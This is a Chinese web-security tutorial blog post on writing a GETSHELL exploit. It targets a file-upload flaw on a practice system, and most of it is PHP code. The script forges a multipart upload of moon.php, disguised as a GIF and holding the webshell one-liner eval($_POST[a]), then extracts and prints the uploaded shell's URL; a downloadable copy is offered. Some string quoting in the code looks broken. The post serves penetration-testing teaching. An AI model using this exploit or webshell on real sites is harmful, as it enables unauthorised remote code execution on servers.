WEB安全第七章exp编写三


Sep 27 2018

WEB安全第七章exp编写三

首页 » 原创作品 » WEB安全第七章exp编写三   

WEB安全第七章exp编写三 GETSHELL编写


上篇 我教大家编写了一个post注入的exp这一节同样也是关于post提交,很多同学都喜欢GETHSELL ,怎么写GETHSLL脚本,

gethshell就是直接得到权限,有直接指向执行命令,或上传一个木马 (getwebshell)。

访问暗月靶机系统 访问上传漏洞测试。


13.png

14.png


通过测试 上传漏洞测试 是可以直接上传图片木马的。 直接使用burpsuite抓包 。


POST /upload.php HTTP/1.1
Host: target_sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://target_sys.com/upload.php
Content-Type: multipart/form-data; boundary=---------------------------86531354118821
Content-Length: 23124
Cookie: PHPSESSID=8fj89vrpvaavg5sc92ifg5gu75
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------86531354118821
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

GIF89ad




使用php编写GETSHELL 是使用socket扩展 确保 php.ini  开启 socket.dll


function http_send($host, $packet){

        $sock = fsockopen($host, 80);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 Trying again...";
                $sock = fsockopen($host, 80);
        }
        
        fputs($sock, $packet);
        
        while (!feof($sock)) {

                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}


以上代码是模拟post包发送和获取。


    function data($host,$filename){
       
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"\r\n";
        $payload .= "Content-Type:  image/jpeg\r\n\r\n";
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name="sub"";
        $payload .="\r\n\r\n";
        $payload .="12132\r\n";
        $payload .="-----------------------------86531354118821--\r\n";
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
       
        return $packet;

    }




模拟POST包提交,这里跟抓来的包处理后 是相同。


---------------------------86531354118821-- 这个部分是提交匹配的代码。


16.png


$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";


这部分是你要上传的图片木马内容 



  1. $filename  = "moon.php";

  2. $host = "target_sys.com";
  3. print http_send($host,data($host,$filename));



$filename 这个是上传的文件名,$host 这个部分是域名。

以下是getshell的代码。保存为exp2.php


<?php

function http_send($host, $packet){

        $sock = fsockopen($host, 80);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 Trying again...";
                $sock = fsockopen($host, 80);
        }
        
        fputs($sock, $packet);
        
        while (!feof($sock)) {

                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}



function data($host,$filename){
        
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"\r\n";
        $payload .= "Content-Type:  image/jpeg\r\n\r\n";
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name="sub"";
        $payload .="\r\n\r\n";
        $payload .="12132\r\n";
        $payload .="-----------------------------86531354118821--\r\n";
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
        
        return $packet;

}

$filename  = "moon.php";

$host = "target_sys.com";
print http_send($host,data($host,$filename));



执行脚本如图

17.png


终端下返回信息,有很多内容 并不是想要的,所以要进行WEBSHELL的路径进行截取。返回所需的内容。完整的exp如下

	    <?php

    function http_send($host, $packet){

            $sock = fsockopen($host, 80);
            
            if(!$sock){
                    print "\n[-] No response from {$host}:80 Trying again...";
                    $sock = fsockopen($host, 80);
            }
            
            fputs($sock, $packet);
            
            while (!feof($sock)) {

                    $resp .= fread($sock, 1024);
            }
            
            fclose($sock);
            return $resp;

    }



    function data($host,$filename){
            
            $payload  = "-----------------------------86531354118821\r\n";
            $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"\r\n";
            $payload .= "Content-Type:  image/jpeg\r\n\r\n";
            $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
            $payload .= "-----------------------------86531354118821\r\n";
            $payload .= "Content-Disposition: form-data; name="sub"";
            $payload .="\r\n\r\n";
            $payload .="12132\r\n";
            $payload .="-----------------------------86531354118821--\r\n";
            $packet  = "POST /upload.php HTTP/1.1\r\n";
            $packet .= "Host: {$host}\r\n";
            $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
            $packet .= "Content-Length: ".strlen($payload)."\r\n";
            $packet .= "Connection: close\r\n\r\n";
            $packet .= $payload;
            
            return $packet;

    }


    $filename  = "moon.php";
    $host = "target_sys.com";
    $html_str =http_send($host,data($host,$filename));

    preg_match("/Stored in: (.*?)</", $html_str,$m);

    if ($m[1]){
            echo "http://".$host."/".$m[1];
    }else{
            echo "flase";
    }



exp下载 exp2.rar


执行脚本


18.png

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: exp编写

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «WEB安全第七章exp编写四 | WEB安全第七章exp编写二»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~